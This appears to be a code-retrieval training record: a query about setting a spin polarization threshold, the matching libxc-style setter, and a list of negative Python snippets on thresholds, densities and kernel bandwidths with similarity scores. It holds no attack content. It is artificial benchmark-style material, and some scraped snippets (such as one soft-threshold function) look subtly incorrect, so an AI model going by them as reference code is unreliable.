Plugin()._probabilities_to_percentiles(self.cube, self.percentiles)", "def set_suppress_flow(self):\n self.suppressed = self.packet_count\n self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'suppressed': self.suppressed},})", "def setPowerFromDensity(self):\n self.p.power = self.p.powerDensity * self.getHMMass()", "def _set_bandwidth(self):\n if self._N > 0:\n self._kernel_cov = self._cov * self._N ** (-2./(self._dim + 4))\n\n # Used to evaluate PDF with cho_solve()\n self._cho_factor = la.cho_factor(self._kernel_cov)\n\n # Make sure the estimated PDF integrates to 1.0\n self._lognorm = self._dim/2.0 * np.log(2.0*np.pi) + np.log(self._N) +\\\n np.sum(np.log(np.diag(self._cho_factor[0])))\n\n else:\n self._lognorm = -np.inf", "def apply_thresholding(x):\n return x > threshold_otsu(x)", "def test_threshold_no_bounds(self):\n code, out, err = self.t.runError(\"--threshold\")\n self.assertIn(\"A min, and max, or both threshold values should be specified.\", out)", "def soft_threshold(X, sigma):\r\n tmp = abs(X) - sigma\r\n tmp[np.where(tmp < 0)] = 0\r\n return tmp * np.sign(X)", "def apply_threshold(heatmap, threshold):\n # Zero out pixels below the threshold\n heatmap[heatmap <= threshold] = 0\n # Return thresholded map\n return heatmap", "def apply_threshold(heatmap, threshold):\n # Zero out pixels below the threshold\n heatmap[heatmap <= threshold] = 0\n # Return thresholded map\n return heatmap", "def apply_threshold(heatmap, threshold):\n # Zero out pixels below the threshold\n heatmap[heatmap <= threshold] = 0\n # Return thresholded map\n return heatmap", "def cutoff(self, *args, **kwargs) -> Any:\n pass", "def soft_threshold(X, threshold):\n X_thresholded = (np.abs(X) > threshold).astype('int')\n X_soft_threshold = np.sign(X) * (np.abs(X) - threshold) * X_thresholded\n return X_soft_threshold", "def set_zeta_threshold(self, zeta_threshold):\n\n if zeta_threshold < 0:\n raise ValueError(\"The spin polarization threshold cannot be smaller than 0.\")\n\n core.xc_func_set_zeta_threshold(self.xc_func, ctypes.c_double(zeta_threshold))", "def _perturbInPlaceSoft(self):\n kevRandom = KevRandom()\n if random.random() < 0.5:\n newThreshold = -1\n while newThreshold < 0 or newThreshold > 1:\n newThreshold = self.threshold + kevRandom.laplacian() #* 0.1\n self.threshold = newThreshold\n 
else:\n self.beta += kevRandom.laplacian() #* 0.1", "def likelihood_threshold(dlc, threshold=0.9):\r\n features = np.unique(['_'.join(x.split('_')[:-1]) for x in dlc.keys()])\r\n for feat in features:\r\n nan_fill = dlc[f'{feat}_likelihood'] < threshold\r\n dlc[f'{feat}_x'][nan_fill] = np.nan\r\n dlc[f'{feat}_y'][nan_fill] = np.nan\r\n\r\n return dlc", "def _importance_based_graph_cut(self, graph, threshold):\n for node, data in graph.nodes_iter(data=True):\n if float(data['importance']) < threshold:\n graph.remove_node(node)\n return", "def __init__(self, factor: float = 0.5, threshold: float = 0.3, initial_val: float = 0.0) -> None:\n self.factor = factor\n self.threshold = threshold\n self.initial_val = initial_val", "def get_threshold(self):\n confs = self.confidence[\"conf\"]\n\n return compute_minimum_kernel_density(confs)", "def densitychange(self,dt=0.1):\n #Using conservation of mass and diffusion\n dp_dt = -div(self.u*self.d)\n dp_dt += ndimage.laplace(self.d)\n #This term seems to make the density clump together, producing \n #waves which can make the simulation blow up.\n #dp_dt -= np.add.reduce(self.u*np.array(np.gradient(self.d)))\n #Edge density shouldn't change.\n dp_dt[[0,-1]] = dp_dt[:,[0,-1]] = 0\n self.d += dp_dt*dt\n #Change pressure accordingly to ideal gas law\n #AAAAAAAAAAAAAAAA this fixed most of the poblems from before!!!\n self.P = self.d*8.214*273\n #Conserve mass by spreading out fluctuations \n self.d[1:-1,1:-1] += (self.mass-np.sum(self.d))/self.vol", "def SetNarrowBandwidth(self, value: 'double') -> \"void\":\n return _itkReinitializeLevelSetImageFilterPython.itkReinitializeLevelSetImageFilterIF2_SetNarrowBandwidth(self, value)", "def cutoff(self, state, depth):\n abstract", "def setFrequencyThreshold(self, v):\n return self._set(frequencyThreshold=v)", "def scale_down_utilization_threshold(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"scale_down_utilization_threshold\")", "def threshold_func(distribution: List[float], alpha: List[float], **kwargs) -> float:\n threshold = np.quantile(distribution, q=alpha, interpolation=\"lower\", **kwargs)\n return threshold", "def setThresholdLevel(self, *args):\n return _libsbml.Input_setThresholdLevel(self, *args)", "def unsafe(self): \n return self.distmin < self.distmax*0.5", "def set_filter_fq_pab(self, threshold):\n frequency_table = self._get_existence_frequency()\n self.filter = frequency_table > threshold", "def clearAttribute(self, attr):\n myAttr = getattr(self, attr)\n if type(myAttr) == types.FloatType:\n if myAttr < 1.0 and myAttr > 0.0:\n setattr(self, attr, 0.0)", "def setLowerThreshold(self, lower_threshold):\r\n\t\tself.LowerThreshold = lower_threshold", "def ignore_nan_inf(kde_method):\n def new_kde_method(events_x, events_y, xout=None, yout=None,\n *args, **kwargs):\n bad_in = get_bad_vals(events_x, events_y)\n if xout is None:\n density = np.zeros_like(events_x, dtype=float)\n bad_out = bad_in\n xo = yo = None\n else:\n density = np.zeros_like(xout, dtype=float)\n bad_out = get_bad_vals(xout, yout)\n xo = xout[~bad_out]\n yo = yout[~bad_out]\n # Filter events\n ev_x = events_x[~bad_in]\n ev_y = events_y[~bad_in]\n density[~bad_out] = kde_method(ev_x, ev_y,\n xo, yo,\n *args, **kwargs)\n density[bad_out] = np.nan\n return density\n\n doc_add = \"\\n Notes\\n\" +\\\n \" -----\\n\" +\\\n \" This is a wrapped version that ignores nan and inf values.\"\n new_kde_method.__doc__ = kde_method.__doc__ + doc_add\n\n return new_kde_method", "def thresholdfactor(self):\n return 
self.__thresholdfactor", "def _flag(self, test=False):\n\n if test:\n flag = self.test_flag\n else:\n flag = self._get_flag()\n\n # For each of the temperature add the threshold mask\n for var in TEMPERATURE_VARIABLES:\n self.add_mask(\n var, flag, 'discrepancy threshold exceeded',\n ('The discrepancy between the deiced and non-deiced temperature '\n f'sensors is greater than {TEMPERATURE_THRESHOLD} K.')\n )", "def soft_thresh(x: float, lmb: float) -> float:\n if x < lmb:\n return x + lmb\n elif x > lmb:\n return x - lmb\n else:\n return 0.0", "def set_print_density(self, density=10, break_time=2):\n self.write(self.ASCII_DC2, '#', (density << 5) | break_time)", "def setFrequencyThreshold(self, value):\n return self._set(frequencyThreshold=value)", "def filter_threshold(self, analyte, threshold, filt=False):\n params = locals()\n del(params['self'])\n\n # generate filter\n vals = trace = nominal_values(self.focus[analyte])\n if not isinstance(filt, bool):\n ind = (self.filt.grab_filt(filt, analyte) & ~np.isnan(vals))\n else:\n ind = ~np.isnan(vals)\n\n setn = self.filt.maxset + 1\n\n if any(ind):\n self.filt.add(analyte + '_thresh_below',\n trace <= threshold,\n 'Keep below {:.3e} '.format(threshold) + analyte,\n params, setn=setn)\n self.filt.add(analyte + '_thresh_above',\n trace >= threshold,\n 'Keep above {:.3e} '.format(threshold) + analyte,\n params, setn=setn)\n else:\n # if there are no data\n name = analyte + '_thresh_nodata'\n info = analyte + ' threshold filter (no data)'\n\n self.filt.add(name, np.zeros(self.Time.size, dtype=bool),\n info=info, params=params, setn=setn)", "def discretize(self, threshold=100):\n \n print(\"Starting discretization...\")\n \n if not \"nb_clust\" in self.conf.keys():\n print(\"No number of clusters assigned\\n\")\n self.set_nb_clusters()\n \n self.ts_dis = clustering(self.ts, self.conf[\"nb_clust\"])\n \n error = MAPE(self.ts, self.ts_dis)\n print(error)\n \n if error > threshold:\n self.ts_dis = self.ts\n print(\"\\nError is too high, original time series will be used instead of disctretized one\\n\")\n \n print(\"Discretization done\\n\")", "def prune_dims(variances, threshold=0.005):\r\n scale_z = np.sqrt(variances)\r\n return scale_z >= threshold", "def back_pressure_data_size_threshold(self, back_pressure_data_size_threshold):\n\n self._back_pressure_data_size_threshold = back_pressure_data_size_threshold", "def threshold(self) -> Union[float, TensorType]:\n return self._threshold", "def setErrorThreshold(self, threshold):\n return self._set(errorThreshold=threshold)" ]
[ "0.63226175", "0.61955786", "0.6171416", "0.61262935", "0.59644085", "0.58235157", "0.58235157", "0.58235157", "0.58235157", "0.58235157", "0.57770663", "0.5771117", "0.5760468", "0.5694355", "0.5690046", "0.56802684", "0.5664838", "0.56599784", "0.56505716", "0.5615393", "0.56036675", "0.5583478", "0.55800015", "0.55748904", "0.55462146", "0.55284065", "0.5477165", "0.5432412", "0.542168", "0.5413156", "0.5410299", "0.53955984", "0.53846335", "0.53846335", "0.53846335", "0.53818756", "0.53568023", "0.53568023", "0.53568023", "0.53568023", "0.53568023", "0.5356664", "0.5345707", "0.53343683", "0.53308564", "0.53125155", "0.53105295", "0.5280523", "0.5264158", "0.5219156", "0.5217601", "0.5215107", "0.51969707", "0.5193638", "0.51849675", "0.51827073", "0.51810324", "0.51809156", "0.51791316", "0.5179002", "0.5174902", "0.5174852", "0.5152643", "0.5149663", "0.5145568", "0.51445156", "0.51413494", "0.51413494", "0.51413494", "0.51399225", "0.51366204", "0.51238984", "0.5114076", "0.5105572", "0.5104843", "0.5104542", "0.5103847", "0.50999373", "0.50998485", "0.5099668", "0.5093008", "0.50887877", "0.5085546", "0.508254", "0.50723994", "0.5071583", "0.50704247", "0.5067419", "0.5061885", "0.50618815", "0.50603503", "0.5037746", "0.5034068", "0.5031863", "0.5027113", "0.50204664", "0.5015657", "0.50053734", "0.49967954", "0.4990803" ]
0.7752366
0
Sets the spin polarization threshold below which components will not be evaluated.
def set_zeta_threshold(self, zeta_threshold): if zeta_threshold < 0: raise ValueError("The spin polarization threshold cannot be smaller than 0.") core.xc_func_set_zeta_threshold(self.xc_func, ctypes.c_double(zeta_threshold))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_threshold(self, threshold):\n self._threshold = check_value_positive('threshold', threshold)", "def setThreshold(self, threshold): # real signature unknown; restored from __doc__\n pass", "def setAngleLimit(angle_limit):\n return RoboCaller().call(\"setAngleLimit\", \"void\", angle_limit)", "def set_throttle(self, val):\n\n # Set the motor to stop mode.\n if val is None:\n self.in1.off()\n self.in2.off()\n self.pwm.value = 1.0\n\n else:\n # Determine the orientation of the motor.\n if val > 0.0:\n self.in1.off()\n self.in2.on()\n else:\n self.in1.on()\n self.in2.off()\n\n # Clamp the pwm signal (throttle) to [0, 1].\n pwm = max(0.0, min(abs(val), 1.0))\n\n # Note that setting PWM to low will brake the motor no matter what\n # in1 and in2 input is.\n self.pwm.value = pwm", "def clamp(self):\n self.threshold.data.clamp_(self.min_threshold)", "def _r_spin_changed(self):\n self.rLine.setValue(self.rSpin.value())", "def set_limit_min():\n limit_min = request.params.get(\"limit_min\", 0, type=float)\n output = request.params.get(\"output\", 1, type=int)\n retval = RP_LIB.rp_LimitMin(output, ctypes.c_float(limit_min))\n if retval != 0:\n LOG.error(\"Failed to set minimum output voltage. Error code: %s\", ERROR_CODES[retval])", "def _set_bet_limit(self) -> None:\n for i, ratio in enumerate(BET_LIMIT_RATIOS):\n self._bet_limits[i] = self._treasury_min.get() // ratio", "def __init__(self, threshold: float = 0.3, initial_val: float = 0.0) -> None:\n self.threshold = threshold\n self.initial_val = initial_val", "def _b_spin_changed(self):\n self.bLine.setValue(self.bSpin.value())", "def set_strength_ratios(\n self,\n strength_ratios: Union[float, Tuple[float], np.ndarray],\n ):\n self._strength_ratios = np.clip(\n _convert_to_np_array(strength_ratios, self._num_motors), 0, 1)", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setLowerThreshold(self, lower_threshold):\r\n\t\tself.LowerThreshold = lower_threshold", "def set_min_uncertainty(signal, threshold=0.05):\n # Increase Hirex-Sr uncertainties to be a rel error of 5% minimum (JUST FOR TESTING)\n corrected_unc=signal.std_y/signal.y<=0.05\n signal.std_y[corrected_unc]=0.05*signal.y[corrected_unc]\n\n # correction for normalized uncertainties\n if signal.s/signal.m<=0.05:\n signal.s=0.05*signal.m\n\n signal.std_y_norm=scipy.sqrt((signal.std_y / signal.m)**2.0 + ((signal.y / signal.m)*(signal.s / signal.m))**2.0)", "def setMoveThreshold(self, thresholdLoc, thresholdRot):\r\n self.moveThresholdLoc = thresholdLoc\r\n self.moveThresholdRot = thresholdRot", "def updateThresholdValues (self, DoubleSlider, Node, ThMax ):\n DoubleSlider.Slider.minimum = 0\n DoubleSlider.SpinBoxL.setRange(0,ThMax)\n DoubleSlider.Slider.maximum = ThMax\n DoubleSlider.SpinBoxR.setRange(0,ThMax)\n if ThMax!=0:\n DisplayNode = Node.GetScalarVolumeDisplayNode()\n LowerThreshold = DisplayNode.GetLowerThreshold()\n UpperThreshold = DisplayNode.GetUpperThreshold()\n DoubleSlider.Slider.minimumValue = LowerThreshold\n DoubleSlider.Slider.maximumValue = UpperThreshold \n DoubleSlider.SpinBoxL.blockSignals(True)\n DoubleSlider.SpinBoxR.blockSignals(True)\n DoubleSlider.SpinBoxL.value = LowerThreshold\n DoubleSlider.SpinBoxR.value = UpperThreshold\n 
DoubleSlider.SpinBoxL.blockSignals(False)\n DoubleSlider.SpinBoxR.blockSignals(False)", "def angle_tolerance(self, angle_tolerance):\n\n self._angle_tolerance = angle_tolerance", "def init_patch_clamp(self):\n\n self.pressure.nearing()\n\n # Auto pipette offset and holding at 0 V\n self.amplifier.meter_resist_enable(False)\n self.amplifier.auto_pipette_offset()\n self.amplifier.set_holding(0.)\n self.amplifier.set_holding_enable(True)\n\n # Begin metering\n self.amplifier.meter_resist_enable(True)\n # wait for stable measure\n time.sleep(4)\n # Get pipette resistance\n self.pipette_resistance = self.get_single_resistance_metering(res_type='float')\n if 5e6 > self.pipette_resistance:\n self.update_message('ERROR: Tip resistance is too low ({}).'\n ' Should be higher than 5 MOhm.'.format(self.get_single_resistance_metering('text')))\n self.amplifier.meter_resist_enable(False)\n return 0\n if 10e6 < self.pipette_resistance:\n self.update_message('ERROR: Tip resistance is too high ({}).'\n ' Should be lower than 10 MOhm.'.format(self.get_single_resistance_metering('text')))\n self.amplifier.meter_resist_enable(False)\n return 0\n else:\n self.update_message('Tip resistance is good: {}'.format(self.get_single_resistance_metering('text')))\n self.pipette_resistance_checked = True\n self.set_continuous_meter(True)\n return 1", "def set_polar_max(self, polar_max):\n try:\n if not isinstance(self.polar_angle, np.ndarray):\n self.polar_angle, self.azimuthal_angle = \\\n self.calculate_angles(self.xp, self.yp)\n self.x = []\n self.y = []\n for i in range(self.npks):\n if self.polar_angle[i] <= polar_max:\n self.x.append(self.xp[i])\n self.y.append(self.yp[i])\n except Exception:\n pass\n self.polar_max = polar_max\n self._idx = None", "def set_tau_threshold(self, tau_threshold):\n\n if tau_threshold < 0:\n raise ValueError(\"The tau threshold cannot be smaller than 0.\")\n\n core.xc_func_set_tau_threshold(self.xc_func, ctypes.c_double(tau_threshold))", "def back_pressure_object_threshold(self, back_pressure_object_threshold):\n\n self._back_pressure_object_threshold = back_pressure_object_threshold", "async def async_set_unav_throttle(self, unav_throttle):\n self._unav_throttle = unav_throttle", "def setRange(self, range):\n\t\tself.range = range\n\t\tself.slider.setMinimum(0.0)\n\t\tself.slider.setMaximum(100.0)\n\t\tself.spinbox.setRange(self.range[0], self.range[1])\n\n\t\tdiff = self.range[1] - self.range[0]\n\t\tif diff <= 1:\n\t\t\tself.spinbox.setSingleStep(0.01)", "def __init__(self, rt_tol, exclusion_t_0):\n super().__init__()\n self.rt_tol = rt_tol\n self.exclusion_t_0 = exclusion_t_0\n assert self.exclusion_t_0 <= self.rt_tol", "def SetThreshold (self,VolumeNode, min, max):\n DisplayNode = VolumeNode.GetScalarVolumeDisplayNode()\n DisplayNode.SetApplyThreshold(True)\n DisplayNode.SetThreshold(min,max)", "def setUpperThreshold(self, upper_threshold):\r\n\t\tself.UpperThreshold = upper_threshold", "def threshold(self,thresholdValue):\n # TO DO\n pass", "def _set_minimum(self):\n self._level_gen.minimum_length = self._minimum_length_spinbox.value()\n self._refresh_view()", "def apply_constraint(self):\n\t\tself.angle = self.constraint(self.angle) % 360", "def _spin_changed(self, event):\n val = event.GetValue()\n if val < self.minval:\n self.minval = val\n elif val > self.orig_min:\n self.minval = self.orig_min\n if val > self.maxval:\n self.maxval = val\n elif val < self.orig_max:\n self.maxval = self.orig_max\n self.slider.SetValue(100*(val-self.minval)/(self.maxval-self.minval))\n if 
self.handler:\n self.handler(event)\n event.Skip()", "def spinAround(self):", "def updateThreshold(self, t):\n\n budget = self.budget\n self.threshold = self.init_threshold * self.diameter * ((budget-t) / self.budget)**self.decay_factor", "def _g_spin_changed(self):\n self.gLine.setValue(self.gSpin.value())", "def lbs_changed(self):\n kgs = round(self.spinLbs.value() * 0.453592, 1)\n self.spinKgs.setValue(kgs)", "def spinUpBatter(self):\n self.setVelocity(config.batterShootSpeed)", "def tolerance(self, tolerance: float) -> None:\n self._tolerance = tolerance", "def set_neutral(self, braked=False):\r\n # Setting MOTOR pins to LOW will make it free wheel.\r\n pin_value = 0\r\n if braked:\r\n pin_value = 1 # Setting to HIGH will do active braking.\r\n\r\n # Set a and b pins to either 1 or 0.\r\n if self.a_pin >= 0:\r\n self.GPIO.output(self.a_pin, pin_value)\r\n if self.b_pin >= 0:\r\n self.GPIO.output(self.b_pin, pin_value)\r\n\r\n # Turn motors off by setting duty cycle back to zero.\r\n dutycycle = 0.0\r\n self.target_speed = 0.0\r\n self.current_speed = 0.0\r\n self.PWM.ChangeDutyCycle(dutycycle)", "def set_tolerance(self, tol):\n self.tolerance = tol", "def set_rmax(self, x):\n x = float(x)\n if self.rmax != x:\n self.rmax = x", "def update_spin(self):\n if self.spin:\n self.angle += self.deltaAng\n self.stepsLeft -= 1\n if self.stepsLeft == 0:\n self.replication += self.deltaRep\n if self.revolution % 2 == 0:\n self.offset += self.deltaOff\n self.stepsLeft = self.stepsPer90\n\n if self.angle >= 360.0:\n self.revolution += 1\n self.angle = 0\n self.offset = 0\n self.deltaRep = -self.deltaRep\n glutPostRedisplay()", "def trimCompo(self, threshold):\n newCompo = {}\n for key,value in self.m_compo.items():\n if value > threshold:\n newCompo[ key ] = value\n self.m_compo = newCompo", "def set_particle_tolerance(self, value):\n\n self._particle_tolerance = value", "def on_spinBox_valueChanged(self, p0):\n self.nbr_pts_caracterisation = self.spinBox.value()", "def set_thresh(self, t0=0.5, t1=None):\n self.t0 = t0\n self.t1 = t1", "def matrix_filtering_threshold(self, matrix_filtering_threshold):\n\n self._matrix_filtering_threshold = matrix_filtering_threshold", "def setInternalPulser(self,pulserEnable,pulseHeight):\n pass", "def reduce_velocity(self):\n if self.controls[\"make_velocity_0\"]:\n # print(self.controls[\"bar_move_velocity\"])\n self.controls[\"bar_move_velocity\"] = 0", "def spin_input(self) -> None:\n self.spin_command = not self.spin_command", "def _set_volume(self, polytope_volume):\n if polytope_volume < 0.0:\n raise ValueError(\n '`polytope_volume` must be >= 0, given: {v}'.format(\n v=polytope_volume))\n self._volume = float(polytope_volume)", "def setAzimuthAngle(self, angle):\n angle = int(round(angle))\n if angle != self._azimuth:\n self._azimuth = angle\n self._updateLight()\n self.sigAzimuthAngleChanged.emit()", "def invalidate_min_max(self):\n self.max_amplitude = None\n self.min_amplitude = None\n self.max_wavenumber = None\n self.min_wavenumber = None", "def set_collision_sensitivity(self, value, wait=True):\r\n return self._arm.set_collision_sensitivity(value, wait=wait)", "def reset_colors(self):\n self.spinMinHue.setValue(0)\n self.spinMaxHue.setValue(180)\n self.spinMinSaturation.setValue(0)\n self.spinMaxSaturation.setValue(255)\n self.spinMinValue.setValue(0)\n self.spinMaxValue.setValue(255)", "def setPSampling(self, period):\n if (period < 30 or period > 300):\n return\n self.pSampling = period", "def set_tms_pin_low(self):\n self._dll.JLINKARM_ClrTMS()", 
"def setBrake(self, brake):\r\n if brake < 0.0:\r\n brake = 0.0\r\n elif brake > 1.0:\r\n brake = 1.0\r\n brake *= self.maxBrake\r\n for tire in self.tires:\r\n if tire.brake:\r\n tire.shape.setBrakeTorque( brake )", "def set_wheel(self, wheel):\n self.wheel_turn = clamp(wheel, -1, 1)", "def strict_limit(self, strict_limit):\n\n self._strict_limit = strict_limit", "def clip(self):\n if self._value < self.lowBound:\n self._value = self.lowBound\n elif self._value > self.upBound:\n self._value = self.upBound", "def set_tolerance(self, *args, **kwargs):\n raise ParameterError(\"The %s StoppingCriterioin does not yet support resetting tolerances.\")", "def reset(self,):\n \n self.i = 0\n self.pi = 1.0\n self.si = 0.0\n self.pi_min = float(\"inf\")\n self.si_min = float(\"inf\")", "def quieter(self):\n self._prepare()\n vol = self._eng.getProperty(\"volume\")\n newvol = vol - 0.25\n logging.debug(\"quieter %f => %f\" %(vol, newvol))\n self._eng.setProperty(\"volume\", newvol)\n self._eng.runAndWait()\n self.say(\"quieter\")", "def __init__(self):\n super().__init__()\n self.TERRAIN_VARIANCE = 0.0", "def apply_default_constraints(self):\n try:\n self.apply_secthresh(pipeline_weaksec(self.koi))\n except NoWeakSecondaryError:\n logging.warning('No secondary eclipse threshold set for {}'.format(self.koi))\n self.set_maxrad(default_r_exclusion(self.koi))", "def _unblock_signals(self):\n self._minimum_length_spinbox.blockSignals(False)\n self._maximum_length_spinbox.blockSignals(False)\n self._seed_le.blockSignals(False)", "def set_throttle(self, limit=None, units=None):\n self.delay = 0\n self.max_requests = 1e16\n self.made_requests = 0", "def set_tck_pin_low(self):\n res = self._dll.JLINKARM_ClrTCK()\n if res < 0:\n raise errors.JLinkException('Feature not supported.')\n return None", "def disableCorrelation( band=range(9,25) ) : \n enableCorrelation(band, False)", "def reset(self):\n if self.allowable_max < self.allowable_min:\n raise ValueError(\"{0} max less than min\".format(self))\n self.min_found = self.allowable_max * 1e6\n self.max_found = self.allowable_min * 1e-6\n self.avg_found = self.allowable_min * 0.0\n self.count = 0\n self.value = None", "def reset(self, **kwargs):\n coverage_filter = np.zeros((self.region, self.region))\n coverage_filter[np.random.uniform(0, 1, (self.region, self.region)) < self.coverage] = 1.\n self.resources = np.multiply(\n np.random.uniform(self.min_value, self.max_value, (self.region, self.region)),\n coverage_filter\n )", "def _init_tbd(self, threshold): \n self.threshold = threshold\n self.current_state = self.undefined_band\n self.num_intervals = np.array([0, 0, 0])", "def set_max_volume(self, max_volume):\n self.max_volume = max_volume\n\n if self.max_volume <= self.min_volume:\n raise RuntimeError(\n 'Pipette max volume is less than '\n 'min volume ({0} < {1})'.format(\n self.max_volume, self.min_volume))\n\n self.update_calibrations()\n\n return self", "def takeOff(self):\n\t\tself._altHoldController.setTarget(self._MAX_ALTITUDE)\n\t\tself._taking_off = False", "def reset_uncertainties(self):\n\n # Make a new temporary ExoParameter using the original self.template\n # dictionary and copy the uncertainty values.\n blank = ExoParameter(\"fake\", attr_dict=self.template)\n self.uncertainty = blank.uncertainty\n self.uncertainty_lower = blank.uncertainty_lower\n self.uncertainty_upper = blank.uncertainty_upper", "def __set_max_value(self, value: int) -> None:\n self.__max_value = value * 2000\n half_value = self.__max_value // 2\n\n 
self.__x_spinbox.configure(from_=-half_value, to=half_value)\n self.__x_scale.configure(from_=half_value, to=-half_value)\n self.__y_spinbox.configure(from_=-half_value, to=half_value)\n self.__y_scale.configure(from_=-half_value, to=half_value)\n self.__z_spinbox.configure(from_=-half_value, to=half_value)\n self.__z_scale.configure(from_=half_value, to=-half_value)", "def adjustAngle(self, angle):\n\t\tif self.timeout <= 0:\n\t\t\tself.angle = (self.angle + angle) % 360", "def set_trst_pin_low(self):\n self._dll.JLINKARM_ClrTRST()", "def min_voltage_limit(self, value):\n self._write(MX_MIN_VOLTAGE_LIMIT, value)", "def set_lower_slope(self, lbound, ubound):\n self.lower_slope_l_bound = lbound\n self.lower_slope_u_bound = ubound\n self.is_slope_optimised = True", "def testSetDisabled(self):\n self.mgr.enabled = False\n self.mgr.setGimbalEnabledParam()\n self.mgr.shotMgr.vehicle.message_factory.param_set_encode.assert_called_with(0, mavutil.mavlink.MAV_COMP_ID_GIMBAL, # target system, target component\n \"GMB_GP_CTRL\", 0.0, mavutil.mavlink.MAV_PARAM_TYPE_REAL32 )", "def suck(self, speed=Constants.SUCK_SPEED):\n self.setPercentOutput(speed, -speed)", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def constrainSpeed(self, speedRPM):\n\n if speedRPM > self.motorMaxRPM:\n speedRPM = self.motorMaxRPM\n\n if speedRPM < 0.0:\n speedRPM = 0.0\n\n# print ( \"motorSpeed RPM adjusted: \", speedRPM )\n\n return speedRPM", "def set_allow_approx_motion(self, on_off):\r\n return self._arm.set_allow_approx_motion(on_off)", "def setErrorThreshold(self, threshold):\n return self._set(errorThreshold=threshold)", "def setErrorThreshold(self, threshold):\n return self._set(errorThreshold=threshold)", "def threshold(self) -> float:\n return pulumi.get(self, \"threshold\")", "def kgs_changed(self):\n lbs = round(self.spinKgs.value() * 2.20462, 1)\n self.spinLbs.setValue(lbs)", "def set_pin(self):\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(self.pin, GPIO.OUT)\n GPIO.output(self.pin, GPIO.LOW)\n time.sleep(3)\n GPIO.output(self.pin, GPIO.HIGH)", "def setSnrMin(_snrMin):\n \n simuConfig[\"SNR.MIN\"] = _snrMin", "def lower_bri(self):\r\n for light in self.lights:\r\n bri = self.b.get_light(light,'bri')\r\n bri = bri - 50\r\n if bri < 0:\r\n bri = 1\r\n self.b.set_light(light,'bri',bri)", "def update_vrad_tolerance(self):\n try:\n value = float(self.edit_vrad_tolerance.text())\n except:\n value = None\n self._get_selected_model().metadata[\"velocity_tolerance\"] = value\n return None", "def reset(self):\n self.value = self.min_value", "def __init__(self):\n super(SteklovBoundary, self).__init__()\n self.value = SteklovBoundary.value\n SteklovBoundary.value -= 1\n self.update(param=\"1\")", "def louder(self):\n self._prepare()\n vol = self._eng.getProperty(\"volume\")\n newvol = vol + 0.25\n logging.debug(\"louder %f => %f\" %(vol, newvol))\n self._eng.setProperty(\"volume\", newvol)\n self._eng.runAndWait()\n self.say(\"louder\")" ]
[ "0.58173597", "0.57458097", "0.55919087", "0.5545165", "0.55155236", "0.547716", "0.53742176", "0.53729236", "0.5330762", "0.5303351", "0.52957284", "0.52762413", "0.52762413", "0.52762413", "0.52762413", "0.52762413", "0.52495974", "0.52326035", "0.5226283", "0.52042127", "0.5200355", "0.51992065", "0.5178476", "0.51647085", "0.5164071", "0.5156143", "0.51475084", "0.51460373", "0.51223147", "0.50994235", "0.50617015", "0.50491667", "0.50251096", "0.50116545", "0.5008973", "0.500262", "0.49928716", "0.49905425", "0.4983977", "0.49747238", "0.49592257", "0.49461856", "0.49241948", "0.4923978", "0.49132994", "0.4904083", "0.48962602", "0.4895058", "0.48942098", "0.4892044", "0.4889993", "0.48856276", "0.48779017", "0.4877476", "0.48686197", "0.48612985", "0.48483986", "0.4847416", "0.48457298", "0.48415738", "0.48412797", "0.48355907", "0.48253188", "0.4822181", "0.48210692", "0.4804842", "0.47988266", "0.47958314", "0.4795421", "0.47896388", "0.47847176", "0.47794822", "0.47783297", "0.47739398", "0.47670078", "0.47663385", "0.47661117", "0.47645858", "0.47591284", "0.4755684", "0.47528884", "0.4752548", "0.47500303", "0.47438258", "0.47353458", "0.47352046", "0.47352046", "0.47225988", "0.47209358", "0.47174025", "0.47174025", "0.47057098", "0.47017032", "0.46896735", "0.4689306", "0.46858412", "0.46855202", "0.4683136", "0.46619698", "0.466007" ]
0.56321895
2
Sets the smallest value allowed for sigma = \sqrt(\gamma). Smaller values than this get overwritten in the evaluation.
def set_sigma_threshold(self, sigma_threshold):
    if sigma_threshold < 0:
        raise ValueError("The sigma threshold cannot be smaller than 0.")

    core.xc_func_set_sigma_threshold(self.xc_func, ctypes.c_double(sigma_threshold))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _update_gamma(self):\n # type: () -> None\n if self._world is None:\n self.gamma = np.inf\n return\n # higher bound for the free space volume\n config_space_volume = self._world.get_configuration_space_volume()\n gamma_L = 8*(4/3)* config_space_volume\n self.gamma = gamma_L", "def update_sigma(self):\n self.sigma = self.spw.sigmaSpinBox.value()", "def setGammaValueFromSlider(self):\n self.gammaSpinBox.setValue( self.gammaSlider.value / 1000 )", "def setGammaValueFromSpinBox(self):\n self.gammaSlider.setValue( self.gammaSpinBox.value * 1000)", "def set_gamma(self, name):\n if name=='1H':\n self.gamma=267.513e6*self.time_fact\n #In standard freq: 42.576e6\n elif name=='13C':\n self.gamma=67.262e6*self.time_fact\n # Good average unknown\n self.csa=-130e-6\n elif name=='15N':\n self.gamma=-27.116e6*self.time_fact\n # Large variation possible. See Fushman, Tjandra, and Cowburn, 1998.\n # Also use more commonly accepted value.\n self.csa=-170e-6\n elif name=='17O':\n self.gamma=-36.264e6*self.time_fact\n elif name=='19F':\n self.gamma=251.662e6*self.time_fact\n elif name=='31P':\n self.gamma=108.291e6*self.time_fact", "def update_q(self):\n beta = self.EC_beta\n self.gamma_q = (self.gamma_s - self.gamma_r) * beta + (1 - beta) * self.gamma_q\n self.Sigma_q = (self.Sigma_s - self.Sigma_r) * beta + (1 - beta) * self.Sigma_q\n try:\n assert np.all(np.logical_not(np.isnan(self.gamma_q)))\n except:\n print(\"Invalid update encountered...\")", "def clamp_sigma(self, sigma, sigma_min=.01):\n self.logsigma.data.clamp_(np.log(sigma_min), 